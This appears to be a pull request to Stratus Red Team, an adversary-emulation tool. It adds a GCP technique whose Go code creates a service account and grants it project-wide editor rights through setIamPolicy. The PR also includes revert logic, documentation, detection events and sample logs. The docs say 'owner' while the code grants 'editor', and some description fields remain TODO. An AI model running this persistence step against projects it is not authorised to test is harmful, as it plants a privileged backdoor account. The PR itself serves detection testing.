### PR TITLE
Create an admin service account

### DIFF
--- a/docs/attack-techniques/GCP/gcp.persistence.create-admin-service-account.md
+++ b/docs/attack-techniques/GCP/gcp.persistence.create-admin-service-account.md
@@ -1,0 +1,48 @@
+---
+title: Create an Admin GCP Service Account
+---
+
+# Create an Admin GCP Service Account
+
+
+
+
+Platform: GCP
+
+## MITRE ATT&CK Tactics
+
+
+- Persistence
+- Privilege Escalation
+
+## Description
+
+
+Establishes persistence by creating a new service account and assigning it 
+<code>owner</code> permissions inside the current GCP project.
+
+<span style="font-variant: small-caps;">Warm-up</span>: None
+
+<span style="font-variant: small-caps;">Detonation</span>:
+
+- Create a service account
+- Update the current GCP project's IAM policy to bind the service account to the <code>owner</code> role'
+
+References:
+- https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/
+
+
+## Instructions
+
+```bash title="Detonate with Stratus Red Team"
+stratus detonate gcp.persistence.create-admin-service-account
+```
+## Detection
+
+
+Using the following GCP Admin Activity audit logs events:
+
+- <code>google.iam.admin.v1.CreateServiceAccount</code>
+- <code>SetIamPolicy</code> with <code>resource.type=project</code>
+
+

--- a/docs/attack-techniques/GCP/index.md
+++ b/docs/attack-techniques/GCP/index.md
@@ -6,10 +6,14 @@ Note that some Stratus attack techniques may correspond to more than a single AT
 
 ## Persistence
 
+- [Create an Admin GCP Service Account](./gcp.persistence.create-admin-service-account.md)
+
 - [Create a GCP Service Account Key](./gcp.persistence.create-service-account-key.md)
 
 
 ## Privilege Escalation
+
+- [Create an Admin GCP Service Account](./gcp.persistence.create-admin-service-account.md)
 
 - [Create a GCP Service Account Key](./gcp.persistence.create-service-account-key.md)
 

--- a/docs/attack-techniques/list.md
+++ b/docs/attack-techniques/list.md
@@ -39,6 +39,7 @@ This page contains the list of all Stratus Attack Techniques.
 | [Execute Command on Virtual Machine using Custom Script Extension](./azure/azure.execution.vm-custom-script-extension.md) | [Azure](./azure/index.md) | Execution |
 | [Execute Commands on Virtual Machine using Run Command](./azure/azure.execution.vm-run-command.md) | [Azure](./azure/index.md) | Execution |
 | [Export Disk Through SAS URL](./azure/azure.exfiltration.disk-export.md) | [Azure](./azure/index.md) | Exfiltration |
+| [Create an Admin GCP Service Account](./GCP/gcp.persistence.create-admin-service-account.md) | [GCP](./GCP/index.md) | Persistence, Privilege Escalation |
 | [Create a GCP Service Account Key](./GCP/gcp.persistence.create-service-account-key.md) | [GCP](./GCP/index.md) | Persistence, Privilege Escalation |
 | [Dump All Secrets](./kubernetes/k8s.credential-access.dump-secrets.md) | [Kubernetes](./kubernetes/index.md) | Credential Access |
 | [Steal Pod Service Account Token](./kubernetes/k8s.credential-access.steal-serviceaccount-token.md) | [Kubernetes](./kubernetes/index.md) | Credential Access |

--- a/v2/internal/attacktechniques/gcp/persistence/create-admin-service-account/main.go
+++ b/v2/internal/attacktechniques/gcp/persistence/create-admin-service-account/main.go
@@ -1,0 +1,219 @@
+package gcp
+
+import (
+	"context"
+	_ "embed"
+	"errors"
+	"fmt"
+	"github.com/datadog/stratus-red-team/v2/internal/providers"
+	"github.com/datadog/stratus-red-team/v2/pkg/stratus"
+	"github.com/datadog/stratus-red-team/v2/pkg/stratus/mitreattack"
+	cloudresourcemanager "google.golang.org/api/cloudresourcemanager/v1"
+	iam "google.golang.org/api/iam/v1"
+	"log"
+)
+
+//go:embed main.tf
+var tf []byte
+
+func init() {
+	stratus.GetRegistry().RegisterAttackTechnique(&stratus.AttackTechnique{
+		ID:           "gcp.persistence.create-admin-service-account",
+		FriendlyName: "Create an Admin GCP Service Account",
+		Description: `
+Establishes persistence by creating X
+
+Warm-up: None
+
+Detonation:
+
+- TODO
+
+References: TODO
+`,
+		Detection: `
+Using GCP Admin Activity audit logs event <code>TODO</code>.
+`,
+		Platform:                   stratus.GCP,
+		IsIdempotent:               false,
+		MitreAttackTactics:         []mitreattack.Tactic{mitreattack.Persistence, mitreattack.PrivilegeEscalation},
+		Detonate:                   detonate,
+		Revert:                     revert,
+		PrerequisitesTerraformCode: tf,
+	})
+}
+
+// Note: `roles/owner` cannot be granted through the API
+const roleToGrant = "roles/editor"
+
+func detonate(params map[string]string) error {
+	gcp := providers.GCP()
+	serviceAccountName := params["service_account_name"]
+	serviceAccountEmail := getServiceAccountEmail(serviceAccountName)
+
+	if err := createServiceAccount(gcp, serviceAccountName); err != nil {
+		return err
+	}
+
+	if err := assignProjectRole(gcp, serviceAccountEmail, roleToGrant); err != nil {
+		return err
+	}
+
+	return nil
+}
+
+// createServiceAccount creates a new service account inside of a GCP project
+func createServiceAccount(gcp *providers.GcpProvider, serviceAccountName string) error {
+	iamClient, err := iam.NewService(context.Background(), gcp.Options())
+	if err != nil {
+		return errors.New("Error instantiating GCP IAM Client: " + err.Error())
+	}
+	serviceAccountDisplayName := fmt.Sprintf("%s (service account used by stratus red team)", serviceAccountName)
+	serviceAccountEmail := getServiceAccountEmail(serviceAccountName)
+	path := fmt.Sprintf("projects/%s", gcp.GetProjectId())
+
+	log.Println("Creating service account " + serviceAccountName)
+	_, err = iamClient.Projects.ServiceAccounts.Create(path, &iam.CreateServiceAccountRequest{
+		AccountId:      serviceAccountName,
+		ServiceAccount: &iam.ServiceAccount{DisplayName: serviceAccountDisplayName},
+	}).Do()
+	if err != nil {
+		return errors.New("Unable to create service account: " + err.Error())
+	}
+	log.Println("Successfuly created service account " + serviceAccountEmail)
+	return nil
+}
+
+// assignProjectRole grants a project-wide role to a specific service account
+// it works the same as 'gcloud projects add-iam-policy-binding':
+// * Step 1: Read the project's IAM policy using [getIamPolicy](https://cloud.google.com/resource-manager/reference/rest/v1/projects/getIamPolicy)
+// * Step 2: Create a binding, or add the service account to an existing binding for the role to grant
+// * Step 3: Update the project's IAM policy using [setIamPolicy](https://cloud.google.com/resource-manager/reference/rest/v1/projects/setIamPolicy)
+func assignProjectRole(gcp *providers.GcpProvider, serviceAccountEmail string, roleToGrant string) error {
+	resourceManager, err := cloudresourcemanager.NewService(context.Background(), gcp.Options())
+	if err != nil {
+		return errors.New("unable to instantiate the GCP cloud resource manager: " + err.Error())
+	}
+
+	policyResponse, err := resourceManager.Projects.GetIamPolicy(gcp.GetProjectId(), &cloudresourcemanager.GetIamPolicyRequest{}).Do()
+	if err != nil {
+		return err
+	}
+	var bindingFound = false
+	bindingValue := fmt.Sprintf("serviceAccount:" + serviceAccountEmail)
+	for _, b := range policyResponse.Bindings {
+		if b.Role == roleToGrant {
+			bindingFound = true
+			log.Println("Adding the service account to an existing binding in the project's IAM policy to grant " + roleToGrant)
+			b.Members = append(b.Members, bindingValue)
+		}
+	}
+	if !bindingFound {
+		log.Println("Creating a new binding in the project's IAM policy to grant " + roleToGrant)
+		policyResponse.Bindings = append(policyResponse.Bindings, &cloudresourcemanager.Binding{
+			Role:    roleToGrant,
+			Members: []string{bindingValue},
+		})
+	}
+
+	_, err = resourceManager.Projects.SetIamPolicy(gcp.GetProjectId(), &cloudresourcemanager.SetIamPolicyRequest{
+		Policy: policyResponse,
+	}).Do()
+
+	if err != nil {
+		return fmt.Errorf("Failed to update project IAM policy: " + err.Error())
+	}
+	return nil
+}
+
+func revert(params map[string]string) error {
+	gcp := providers.GCP()
+	serviceAccountName := params["service_account_name"]
+	serviceAccountEmail := getServiceAccountEmail(serviceAccountName)
+
+	// Attempt to remove the role from the service account in the project's IAM policy
+	// fail with a warning (but continue) in case of error
+	unassignProjectRole(gcp, serviceAccountEmail, roleToGrant)
+
+	// Remove service account itself
+	return removeServiceAccount(gcp, serviceAccountName)
+}
+
+// unassignProjectRole un-assigns a project-wide role to a specific service account
+// it works the same as 'gcloud projects remove-iam-policy-binding':
+// * Step 1: Read the project's IAM policy using [getIamPolicy](https://cloud.google.com/resource-manager/reference/rest/v1/projects/getIamPolicy)
+// * Step 2: Remove a binding, or remove the service account from an existing binding for the role to grant
+// * Step 3: Update the project's IAM policy using [setIamPolicy](https://cloud.google.com/resource-manager/reference/rest/v1/projects/setIamPolicy)
+func unassignProjectRole(gcp *providers.GcpProvider, serviceAccountEmail string, roleToGrant string) {
+	resourceManager, err := cloudresourcemanager.NewService(context.Background(), gcp.Options())
+	if err != nil {
+		log.Println("Warning: unable to instantiate the GCP cloud resource manager: " + err.Error())
+		return
+	}
+
+	policyResponse, err := resourceManager.Projects.GetIamPolicy(gcp.GetProjectId(), &cloudresourcemanager.GetIamPolicyRequest{}).Do()
+	if err != nil {
+		log.Println("warning: unable to retrieve the project's IAM policy")
+		return
+	}
+	var bindingFound = false
+	bindingValue := fmt.Sprintf("serviceAccount:" + serviceAccountEmail)
+	for _, binding := range policyResponse.Bindings {
+		if binding.Role == roleToGrant {
+			index := indexOf(binding.Members, bindingValue)
+			if index > -1 {
+				bindingFound = true
+				binding.Members = remove(binding.Members, index)
+			}
+		}
+	}
+	if bindingFound {
+		log.Println("Updating project's IAM policy to remove reference to the service account")
+		_, err := resourceManager.Projects.SetIamPolicy(gcp.GetProjectId(), &cloudresourcemanager.SetIamPolicyRequest{
+			Policy: policyResponse,
+		}).Do()
+		if err != nil {
+			log.Println("Warning: unable to update project's IAM policy: " + err.Error())
+		}
+	} else {
+		log.Println("Warning: did not find reference to the service account in the project's IAM policy")
+	}
+
+}
+
+func removeServiceAccount(gcp *providers.GcpProvider, serviceAccountName string) error {
+	iamClient, err := iam.NewService(context.Background(), gcp.Options())
+	if err != nil {
+		return errors.New("Error instantiating GCP IAM Client: " + err.Error())
+	}
+
+	log.Println("Removing service account " + serviceAccountName)
+	_, err = iamClient.Projects.ServiceAccounts.Delete(getServiceAccountPath(serviceAccountName)).Do()
+	if err != nil {
+		return errors.New("Unable to delete service account: " + err.Error())
+	}
+	return nil
+}
+
+// Utility functions
+
+func getServiceAccountPath(name string) string {
+	return fmt.Sprintf("projects/-/serviceAccounts/%s", getServiceAccountEmail(name))
+}
+
+func getServiceAccountEmail(name string) string {
+	return fmt.Sprintf("%s@%s.iam.gserviceaccount.com", name, providers.GCP().GetProjectId())
+}
+
+func remove(slice []string, index int) []string {
+	return append(slice[:index], slice[index+1:]...)
+}
+
+func indexOf(slice []string, searchValue string) int {
+	for i, current := range slice {
+		if current == searchValue {
+			return i
+		}
+	}
+	return -1
+}

--- a/v2/internal/attacktechniques/gcp/persistence/create-admin-service-account/main.tf
+++ b/v2/internal/attacktechniques/gcp/persistence/create-admin-service-account/main.tf
@@ -1,0 +1,19 @@
+terraform {
+  required_providers {
+    random = {
+      source  = "hashicorp/random"
+      version = "~> 3.3.2"
+    }
+  }
+}
+
+resource "random_string" "suffix" {
+  length      = 6
+  special     = false
+  min_lower   = 3
+  min_numeric = 3
+}
+
+output "service_account_name" {
+  value = format("stratus-red-team-sa-%s", random_string.suffix.result)
+}

--- a/v2/internal/attacktechniques/main.go
+++ b/v2/internal/attacktechniques/main.go
@@ -31,6 +31,7 @@ import (
 	_ "github.com/datadog/stratus-red-team/v2/internal/attacktechniques/azure/execution/vm-custom-script-extension"
 	_ "github.com/datadog/stratus-red-team/v2/internal/attacktechniques/azure/execution/vm-run-command"
 	_ "github.com/datadog/stratus-red-team/v2/internal/attacktechniques/azure/exfiltration/disk-export"
+	_ "github.com/datadog/stratus-red-team/v2/internal/attacktechniques/gcp/persistence/create-admin-service-account"
 	_ "github.com/datadog/stratus-red-team/v2/internal/attacktechniques/gcp/persistence/create-service-account-key"
 	_ "github.com/datadog/stratus-red-team/v2/internal/attacktechniques/k8s/credential-access/dump-secrets"
 	_ "github.com/datadog/stratus-red-team/v2/internal/attacktechniques/k8s/credential-access/steal-serviceaccount-token"

--- a/v2/internal/utils/functions.go
+++ b/v2/internal/utils/functions.go
@@ -2,6 +2,7 @@ package utils
 
 import (
 	"math/rand"
+	"time"
 )
 
 func CoalesceErr(args ...error) error {
@@ -15,6 +16,7 @@ func CoalesceErr(args ...error) error {
 }
 
 func RandomString(length int) string {
+	rand.Seed(time.Now().UnixNano())
 	const letterBytes = "abcdefghijklmnopqrstuvwxyz0123456789"
 	b := make([]byte, length)
 	for i := range b {
@@ -24,6 +26,7 @@ func RandomString(length int) string {
 }
 
 func RandomHexString(length int) string {
+	rand.Seed(time.Now().UnixNano())
 	const letterBytes = "abcdef0123456789"
 	b := make([]byte, length)
 	for i := range b {


### PR DESCRIPTION
### What does this PR do?

New attack technique: create a GCP service account and assign it `roles/editor` at the project level

### How it works

Step 1: Create a service account (easy)
Step 2: Assign the service account editor rights at the project level (harder).

There is no API available to assign permissions to a service account at the project level. Instead, `gcloud projects add-iam-policy-binding` works as follows:
1. Read the project's IAM policy through [getIamPolicy](https://cloud.google.com/resource-manager/reference/rest/v1/projects/getIamPolicy)
2. Add the right binding
  * If a binding for the role already exists, add the service account to the list of members
  * Otherwise, create a new binding
3. Update the project's IAM policy through [setIamPolicy](https://cloud.google.com/resource-manager/reference/rest/v1/projects/setIamPolicy)

### Sample output

``` 
$ go run cmd/stratus/*.go detonate gcp.persistence.create-admin-service-account
2022/07/28 14:13:02 Checking your authentication against GCP
2022/07/28 14:13:02 Warming up gcp.persistence.create-admin-service-account
2022/07/28 14:13:02 Initializing Terraform to spin up technique prerequisites
2022/07/28 14:13:04 Applying Terraform to spin up technique prerequisites
2022/07/28 14:13:05 Creating service account stratus-red-team-sa-46o6qr
2022/07/28 14:13:06 Successfuly created service account stratus-red-team-sa-46o6qr@christophetd-stratus-red-team.iam.gserviceaccount.com
2022/07/28 14:13:07 Creating a new binding in the project's IAM policy to grant roles/editor

$ gcloud projects get-iam-policy christophetd-stratus-red-team
bindings:
- members:
  - serviceAccount:stratus-red-team-sa-46o6qr@christophetd-stratus-red-team.iam.gserviceaccount.com
  role: roles/editor
- members:
  - user:me@gmail.com
  role: roles/owner
- members:
  - user:me@gmail.com
  role: roles/viewer
etag: BwXk3HTcf50=
version: 1
```

Cleanup:

``` 
$ go run cmd/stratus/*.go cleanup gcp.persistence.create-admin-service-account
2022/07/28 14:14:06 Cleaning up gcp.persistence.create-admin-service-account
2022/07/28 14:14:06 Reverting detonation of technique gcp.persistence.create-admin-service-account
2022/07/28 14:14:07 Updating project's IAM policy to remove reference to the service account
2022/07/28 14:14:08 Removing service account stratus-red-team-sa-46o6qr
2022/07/28 14:14:09 Cleaning up technique prerequisites with terraform destroy
+----------------------------------------------+-------------------------------------+--------+
| ID                                           | NAME                                | STATUS |
+----------------------------------------------+-------------------------------------+--------+
| gcp.persistence.create-admin-service-account | Create an Admin GCP Service Account | COLD   |
+----------------------------------------------+-------------------------------------+--------+

$ gcloud projects get-iam-policy christophetd-stratus-red-team
bindings:
- members:
  - user:me@gmail.com
  role: roles/owner
- members:
  - user:me@gmail.com
  role: roles/viewer
etag: BwXk3Hh64co=
version: 1
```

## Notes

We also could have *not* removed the IAM policy binding, but then the service account would still appear in the policy after the service account was removed, with the prefix `deleted:`.